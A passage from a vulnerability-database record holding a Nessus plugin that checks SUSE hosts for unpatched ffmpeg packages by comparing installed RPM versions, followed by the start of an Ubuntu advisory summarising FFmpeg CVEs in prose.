"p-cpe:/a:novell:suse_linux:libswresample2", "p-cpe:/a:novell:suse_linux:libswscale-devel", "p-cpe:/a:novell:suse_linux:libswscale4", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2021-2322-1.NASL", "href": "https://www.tenable.com/plugins/nessus/151651", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2021:2322-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151651);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/09\");\n\n script_cve_id(\n \"CVE-2019-17539\",\n \"CVE-2020-13904\",\n \"CVE-2020-20448\",\n \"CVE-2020-20451\",\n \"CVE-2020-21041\",\n \"CVE-2020-22015\",\n \"CVE-2020-22016\",\n \"CVE-2020-22017\",\n \"CVE-2020-22019\",\n \"CVE-2020-22020\",\n \"CVE-2020-22021\",\n \"CVE-2020-22022\",\n \"CVE-2020-22023\",\n \"CVE-2020-22025\",\n \"CVE-2020-22026\",\n \"CVE-2020-22031\",\n \"CVE-2020-22032\",\n \"CVE-2020-22033\",\n \"CVE-2020-22034\",\n \"CVE-2020-22038\",\n \"CVE-2020-22039\",\n \"CVE-2020-22043\",\n \"CVE-2020-22044\"\n );\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2021:2322-1\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : ffmpeg (SUSE-SU-2021:2322-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLED15 / SLES15 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the SUSE-SU-2021:2322-1 advisory.\n\n - In FFmpeg before 4.2, avcodec_open2 in libavcodec/utils.c allows a NULL pointer dereference and possibly\n unspecified other impact when there is no valid close function pointer. (CVE-2019-17539)\n\n - FFmpeg 2.8 and 4.2.3 has a use-after-free via a crafted EXTINF duration in an m3u8 file because\n parse_playlist in libavformat/hls.c frees a pointer, and later that pointer is accessed in\n av_probe_input_format3 in libavformat/format.c. (CVE-2020-13904)\n\n - FFmpeg 4.1.3 is affected by a Divide By Zero issue via libavcodec/ratecontrol.c, which allows a remote\n malicious user to cause a Denial of Service. (CVE-2020-20448)\n\n - Denial of Service issue in FFmpeg 4.2 due to resource management errors via fftools/cmdutils.c.\n (CVE-2020-20451)\n\n - Buffer Overflow vulnerability exists in FFmpeg 4.1 via apng_do_inverse_blend in libavcodec/pngenc.c, which\n could let a remote malicious user cause a Denial of Service (CVE-2020-21041)\n\n - Buffer Overflow vulnerability in FFmpeg 4.2 in mov_write_video_tag due to the out of bounds in\n libavformat/movenc.c, which could let a remote malicious user obtain sensitive information, cause a Denial\n of Service, or execute arbitrary code. (CVE-2020-22015)\n\n - A heap-based Buffer Overflow vulnerability in FFmpeg 4.2 at libavcodec/get_bits.h when writing .mov files,\n which might lead to memory corruption and other potential consequences. (CVE-2020-22016)\n\n - A heap-based Buffer Overflow vulnerability exists in FFmpeg 4.2 at ff_fill_rectangle in\n libavfilter/drawutils.c, which might lead to memory corruption and other potential consequences.\n (CVE-2020-22017)\n\n - Buffer Overflow vulnerability in FFmpeg 4.2 at convolution_y_10bit in libavfilter/vf_vmafmotion.c, which\n could let a remote malicious user cause a Denial of Service. (CVE-2020-22019)\n\n - Buffer Overflow vulnerability in FFmpeg 4.2 in the build_diff_map function in libavfilter/vf_fieldmatch.c,\n which could let a remote malicious user cause a Denial of Service. (CVE-2020-22020)\n\n - Buffer Overflow vulnerability in FFmpeg 4.2 at filter_edges function in libavfilter/vf_yadif.c, which\n could let a remote malicious user cause a Denial of Service. (CVE-2020-22021)\n\n - A heap-based Buffer Overflow vulnerability exists in FFmpeg 4.2 in filter_frame at\n libavfilter/vf_fieldorder.c, which might lead to memory corruption and other potential consequences.\n (CVE-2020-22022)\n\n - A heap-based Buffer Overflow vulnerabililty exists in FFmpeg 4.2 in filter_frame at\n libavfilter/vf_bitplanenoise.c, which might lead to memory corruption and other potential consequences.\n (CVE-2020-22023)\n\n - A heap-based Buffer Overflow vulnerability exists in gaussian_blur at libavfilter/vf_edgedetect.c, which\n might lead to memory corruption and other potential consequences. (CVE-2020-22025)\n\n - Buffer Overflow vulnerability exists in FFmpeg 4.2 in the config_input function at\n libavfilter/af_tremolo.c, which could let a remote malicious user cause a Denial of Service.\n (CVE-2020-22026)\n\n - A Heap-based Buffer Overflow vulnerability exists in FFmpeg 4.2 at libavfilter/vf_w3fdif.c in\n filter16_complex_low, which might lead to memory corruption and other potential consequences.\n (CVE-2020-22031)\n\n - A heap-based Buffer Overflow vulnerability exists FFmpeg 4.2 at libavfilter/vf_edgedetect.c in\n gaussian_blur, which might lead to memory corruption and other potential consequences. (CVE-2020-22032)\n\n - A heap-based Buffer Overflow Vulnerability exists FFmpeg 4.2 at libavfilter/vf_vmafmotion.c in\n convolution_y_8bit, which could let a remote malicious user cause a Denial of Service. (CVE-2020-22033)\n\n - A heap-based Buffer Overflow vulnerability exists FFmpeg 4.2 at libavfilter/vf_floodfill.c, which might\n lead to memory corruption and other potential consequences. (CVE-2020-22034)\n\n - A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak in the\n ff_v4l2_m2m_create_context function in v4l2_m2m.c. (CVE-2020-22038)\n\n - A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak in the inavi_add_ientry\n function. (CVE-2020-22039)\n\n - A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak at the fifo_alloc_common\n function in libavutil/fifo.c. (CVE-2020-22043)\n\n - A Denial of Service vulnerability exists in FFmpeg 4.2 due to a memory leak in the\n url_open_dyn_buf_internal function in libavformat/aviobuf.c. (CVE-2020-22044)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1172640\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186406\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186583\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186586\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186587\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186596\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186597\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186598\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186600\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186605\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186613\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186614\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186615\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186616\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186658\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186660\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186757\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186758\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186762\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186763\");\n # https://lists.suse.com/pipermail/sle-security-updates/2021-July/009140.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7c19125e\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-17539\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-13904\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-20448\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-20451\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-21041\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22015\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22016\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22017\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22019\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22020\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22021\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22022\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22023\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22025\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22026\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22031\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22032\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22033\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22034\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22038\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22039\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22043\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-22044\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-17539\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ffmpeg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavcodec-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavcodec57\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavdevice57\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavfilter6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavformat-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavformat57\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavresample-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavresample3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavutil-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libavutil55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpostproc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpostproc54\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libswresample-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libswresample2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libswscale-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libswscale4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLED15 / SLES15', 'SUSE ' + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE ' + os_ver, cpu);\n\nvar sp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP2/3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP2/3\", os_ver + \" SP\" + sp);\n\nvar pkgs = [\n {'reference':'libavcodec57-3.4.2-11.3.1', 'sp':'2', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.2'},\n {'reference':'libavcodec57-3.4.2-11.3.1', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.2'},\n {'reference':'libavformat57-3.4.2-11.3.1', 'sp':'2', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.2'},\n {'reference':'libavformat57-3.4.2-11.3.1', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.2'},\n {'reference':'libavutil-devel-3.4.2-11.3.1', 'sp':'2', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.2'},\n {'reference':'libavutil-devel-3.4.2-11.3.1', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.2'},\n {'reference':'libavutil55-3.4.2-11.3.1', 'sp':'2', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.2'},\n {'reference':'libavutil55-3.4.2-11.3.1', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.2'},\n {'reference':'libpostproc-devel-3.4.2-11.3.1', 'sp':'2', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.2'},\n {'reference':'libpostproc-devel-3.4.2-11.3.1', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.2'},\n {'reference':'libpostproc54-3.4.2-11.3.1', 'sp':'2', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.2'},\n {'reference':'libpostproc54-3.4.2-11.3.1', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.2'},\n {'reference':'libswresample-devel-3.4.2-11.3.1', 'sp':'2', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.2'},\n {'reference':'libswresample-devel-3.4.2-11.3.1', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.2'},\n {'reference':'libswresample2-3.4.2-11.3.1', 'sp':'2', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.2'},\n {'reference':'libswresample2-3.4.2-11.3.1', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.2'},\n {'reference':'libswscale-devel-3.4.2-11.3.1', 'sp':'2', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.2'},\n {'reference':'libswscale-devel-3.4.2-11.3.1', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.2'},\n {'reference':'libswscale4-3.4.2-11.3.1', 'sp':'2', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.2'},\n {'reference':'libswscale4-3.4.2-11.3.1', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.2'},\n {'reference':'libavcodec57-3.4.2-11.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.3'},\n {'reference':'libavcodec57-3.4.2-11.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.3'},\n {'reference':'libavformat57-3.4.2-11.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.3'},\n {'reference':'libavformat57-3.4.2-11.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.3'},\n {'reference':'libavutil-devel-3.4.2-11.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.3'},\n {'reference':'libavutil-devel-3.4.2-11.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.3'},\n {'reference':'libavutil55-3.4.2-11.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.3'},\n {'reference':'libavutil55-3.4.2-11.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.3'},\n {'reference':'libpostproc-devel-3.4.2-11.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.3'},\n {'reference':'libpostproc-devel-3.4.2-11.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.3'},\n {'reference':'libpostproc54-3.4.2-11.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.3'},\n {'reference':'libpostproc54-3.4.2-11.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.3'},\n {'reference':'libswresample-devel-3.4.2-11.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.3'},\n {'reference':'libswresample-devel-3.4.2-11.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.3'},\n {'reference':'libswresample2-3.4.2-11.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.3'},\n {'reference':'libswresample2-3.4.2-11.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.3'},\n {'reference':'libswscale-devel-3.4.2-11.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.3'},\n {'reference':'libswscale-devel-3.4.2-11.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.3'},\n {'reference':'libswscale4-3.4.2-11.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.3'},\n {'reference':'libswscale4-3.4.2-11.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-desktop-applications-release-15.3'},\n {'reference':'ffmpeg-3.4.2-11.3.1', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-packagehub-subpackages-release-15.2'},\n {'reference':'libavdevice57-3.4.2-11.3.1', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-packagehub-subpackages-release-15.2'},\n {'reference':'libavfilter6-3.4.2-11.3.1', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-packagehub-subpackages-release-15.2'},\n {'reference':'ffmpeg-3.4.2-11.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-packagehub-subpackages-release-15.3'},\n {'reference':'libavdevice57-3.4.2-11.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-packagehub-subpackages-release-15.3'},\n {'reference':'libavfilter6-3.4.2-11.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-packagehub-subpackages-release-15.3'},\n {'reference':'libavcodec-devel-3.4.2-11.3.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.2'},\n {'reference':'libavcodec-devel-3.4.2-11.3.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.2'},\n {'reference':'libavformat-devel-3.4.2-11.3.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.2'},\n {'reference':'libavformat-devel-3.4.2-11.3.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.2'},\n {'reference':'libavresample-devel-3.4.2-11.3.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.2'},\n {'reference':'libavresample-devel-3.4.2-11.3.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.2'},\n {'reference':'libavresample3-3.4.2-11.3.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.2'},\n {'reference':'libavresample3-3.4.2-11.3.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.2'},\n {'reference':'libavcodec-devel-3.4.2-11.3.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.3'},\n {'reference':'libavcodec-devel-3.4.2-11.3.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.3'},\n {'reference':'libavformat-devel-3.4.2-11.3.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.3'},\n {'reference':'libavformat-devel-3.4.2-11.3.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.3'},\n {'reference':'libavresample-devel-3.4.2-11.3.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.3'},\n {'reference':'libavresample-devel-3.4.2-11.3.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.3'},\n {'reference':'libavresample3-3.4.2-11.3.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.3'},\n {'reference':'libavresample3-3.4.2-11.3.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-we-release-15.3'}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (exists_check) {\n if (!rpm_exists(release:release, rpm:exists_check)) continue;\n if ('ltss' >< tolower(exists_check)) ltss_caveat_required = TRUE;\n }\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'ffmpeg / libavcodec-devel / libavcodec57 / libavdevice57 / etc');\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2022-01-04T15:02:33", "description": "It was discovered that FFmpeg incorrectly verified empty audio packets or \nHEVC data. An attacker could possibly use this issue to cause a denial of \nservice via a crafted file. This issue only affected Ubuntu 16.04 LTS, as \nit was already fixed in Ubuntu 18.04 LTS. For more information see: \n<https://usn.ubuntu.com/usn/usn-3967-1> \n(CVE-2018-15822, CVE-2019-11338)\n\nIt was discovered that FFmpeg incorrectly handled sscanf failures. An \nattacker could possibly use this issue to cause a denial of service or \nother unspecified impact. This issue only affected Ubuntu 16.04 LTS and \nUbuntu 18.04 LTS. (CVE-2019-12730)\n\nIt was discovered that FFmpeg incorrectly handled certain WEBM files. An \nattacker could possibly use this issue to obtain sensitive data or other \nunspecified impact. This issue only affected Ubuntu 20.04 LTS. \n(CVE-2019-13312)\n\nIt was discovered that FFmpeg incorrectly handled certain AVI files. An \nattacker could possibly use this issue to cause a denial of service or \nother unspecified impact. This issue only affected Ubuntu 16.04 LTS and \nUbuntu 18.04 LTS. (CVE-2019-13390)\n\nIt was discovered that FFmpeg incorrectly handled certain input. An \nattacker could possibly use this issue to cause a denial of service or \nother unspecified impact. This issue only affected Ubuntu 18.04 LTS. \n(CVE-2019-17539)\n\nIt was discovered that FFmpeg incorrectly handled certain input during \ndecoding of VQA files. 